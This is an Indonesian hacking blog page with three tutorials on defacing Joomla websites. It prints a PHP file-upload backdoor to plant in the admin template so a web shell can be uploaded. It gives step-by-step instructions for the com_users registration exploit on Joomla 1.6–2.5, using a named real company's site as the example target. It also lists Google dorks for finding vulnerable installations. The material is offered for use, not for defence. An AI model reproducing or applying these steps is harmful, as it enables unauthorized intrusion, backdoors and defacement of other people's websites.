SCA

Sabtu, 21 Desember 2013

Cara Memasang Shell Di Joomla

Cara memasang shell di Joomla - Bagaimana cara menebas index di web joomla? ada dua cara untuk menebas index di web joomla. yang pertama ke template manager lalu ganti script web tersebut dengan sript deface kamu. yang kedua dengan memasang shell lalu tebas index.php nya. Dan kali ini saya akan menjelaskan cara yang kedua, yaitu cara menanam/memasang shell di web Joomla.

Bahan: Shell || Download Here ||

Langkah-Langkah:
1. Login ke halaman Administrator ( site.com/administrator ).
*Tulisan berwarna hijau, ganti dengan alamat web joomla yang akan ditanam shell.

2. Klik menu Template Manager yang terdapat di halaman utama.

3. Lihat Template Administrator yang aktif ( Yang aktif terdapat tanda bintang ). lalu klik tombol Templates.

4. Klik pada judul Template Administrator yang aktif tadi.

5. Klik pada tulisan Edit Main Page Templates.

6. Taruh Script ini di bawah Script halaman Administrator. dan save.

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>

7. Setelah Save berhasil, akan muncul fasilitas untuk mengupload shell. ( terdapat di paling bawah halaman administrator ). Lalu pilih file shell kamu.

8. Setelah Shell dipilih. Klik pada tombol Upload.

*jika berhasil, akan ada tulisan Upload Sukses !!!

9. Masuk ke dalam shell kamu ( site.com/administrator/Nama shell kamu.php ) Lalu cari tulisan index.php dan klik pada tombol edit
*Tulisan berwarna hijau harus di ganti.

10. Hapus semua script dan tempel script kamu. Lalu klik tombol save.

*Jika sudah berhasil, akan muncul tampilan script deface anda
Jika ingin masuk ke dalam shell kamu lagi. tinggal tulis url site.com/administrator/nama shell kamu.php

sekian, terimakasih :)

Cara Deface Dengan Metode Com User

Cara deface web dengan metode Com_User/Exploit Joomla - Com_User adalah Teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di seluruh indonesia. Com_User / Teknik Exploit joomla ini bisa di gunakan untuk web yang menggunakan joomla versi 1.6/ 1.7.3/ 2.5.

Bahan-Bahan

1. Exploit Joomla || Download disini ||

Langkah-Langkah

1. Cari web target di google dengan google dork ini.

Baca Juga: Google Dork Com_User

intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it

(atau)

intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

(atau)

intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

Penjelasan:

*site: boleh diganti dengan com/ ca/ it/ za/ id/ ru dll (terserah anda)

intitle berarti, kata yang terkandung dalam judul sebuah Web.

intext berarti, kata yang terkandung didalam web tersebut.

site berarti, domain yang digunakan oleh web tersebut. ca=Canada ru=Russia dan sebagainya.

*Google Dork kembangin sendiri agar mendapat hasil yang lebih maksimal.

2. Open link in new tab, semua web yang muncul di hasil pencarian google. karena tidak semua web bisa.

3. Cari web yang vuln.

Gambar diatas merupakan site Vuln.

Gambar diatas merupakan site "Joomla yang samar-samar".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomlanya."

*Web yang saya namakan "samar-samar" itu bukan berarti sitenya tidak tidak bisa di deface/ tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya hanya 5% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.

*Pastikan Web yang anda ingin deface adalah web yang vuln. karena web yang vuln 60% nya bisa di deface.

4. Setelah menemukan site yang vuln. masukkan exploit berikut di belakang sitenya

index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://www.aquafiltersrbija.rs. maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi hhttp://www.aquafiltersrbija.rs/index.php?option=com_users&view=registration

5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.

6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombolctrl+u / klik kanan -> Lihat sumber laman

7. Cari kode hidden (dengan ctrl+f )dan cari kode seperti gambar di bawah ini.

8. Copy code yang di beri kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.

9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak yang di paling bawah. Dan masukkan alamat web yang telah di exploit tersebut contoh: http://www.aquafiltersrbija.rs/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.

*Jangan lupa ganti alamat email dan username nya (terserah kamu )

*Password dibiarkan berbeda

10. Save file tersebut.

11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )

12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.

13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.

14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

15. Ganti password tersebut (terserah anda) dan klik register kembali.

16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.

*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.

17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)

*misal alamat web nya adalah http://www.aquafiltersrbija.rs maka anda harus menambahkan /administrator di belakang web nya. seperti http://www.aquafiltersrbija.rs/administrator/

18. Setelah itu anda masukkan username dan password, lalu login.

19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

Cara tebas Index di web Joomla || Baca Disini ||

*Ada 4 kemungkinan GAGAL untuk web yang menggunakan CMS Joomla:

1. Web telah menghapus laman Registration Form.

2. Alamat Activation Link tidak masuk kedalam email.

3. User sudah diaktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut.

4. Template tidak bisa di di ubah.

Paling sering GAGAL pada nomor 2

sekian, terimakasih

Created By : btk101code

Google Dork Com User

Apa itu Google Dork menurut Istilah Hacking?

Google Dork adalah salah satu kata kunci, untuk mempermudah pencarian menggunakan situs search engine terkenal seperti Google dan biasanya digunakan untuk mencari data-data yang tersembunyi seperti user, password dan lain lain. Google Dork biasanya dipakai oleh hacker-hacker di seluruh dunia, untuk mencari target atau kelemahan suatu Web.

Mengapa banyak orang yang Mendaface Web Joomla dengan metode ini?

Deface dengan menggunakan metode Com_User sangat sering digunakan. karena, target yang bisa di deface dengan cara ini cukup banyak dan mudah untuk dicari. apalagi anda mempunyai google dork yang berkualitas.

Baca Juga: Cara Deface Web dengan Metode Com_User

Elemen-Elemen yang ada pada Google Dork
1. Inurl:
Inurl berarti kata yang terkandung dalam sebuah URL / alamat sebuah web.
2. Intext:
Intext berarti kata yang terdapat pada Template / Isi / Artikel sebuah website.
3. Intitle:
Intitle berarti kata yang terkandung pada sebuah Judul.
4. Site:
Site berarti domain yang dipakai web tersebut. (Com/Net/Org dll)

Macam-Macam Google Dork yang dipakai untuk mencari target dengan metode Com_User.

intext:Usar un nombre de usuario y contraseña válido para poder tener acceso a la Administración.. Joomla!® es software libre distribuido bajo la licencia GNU/GPL. Pack creado por Joomla!Spanish - 2011 - Hosting Joomla Spanish Webempresa

intitle:home page beez joomla 1.6 inurl:com/joomla

intitle:home page beez 2 inurl:com/joomla

intitle:home page beez 5 inurl:com/joomla

intitle:home page atomic inurl:com/joomla

intext:Joomla!® - бесплатное программное обеспечение, распространяемое по лицензии GNU General Public License
Локализация: Портал Joomla! по-русски. Техническая поддержка: Форум русской поддержки Joomla! CMS inurl:/administrator

intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it

intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

inurl:/administrator/index.php intext:Use a valid username and password to gain access to the administrator backend. Joomla!® is free software released under the GNU General Public License.

intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

inurl:index.php/using-joomla/extensions/components/users-component/registration-form

Google Dork yang berwarna merah, memiliki kualitas tinggi.
Google Dork yang berwarna biru, memiliki kualitas sedang.
Google Dork yang berwarna oranye, memiliki kualitas rendah.

*Untuk hasil yang lebih maksimal, anda harus mengkreasikan google dork.

Terimkasih, Semoga bermanfaat

Created By : btk101code

Recent Post

Cara Memasang Shell Di Joomla

Cara Deface Dengan Metode Com User

Google Dork Com User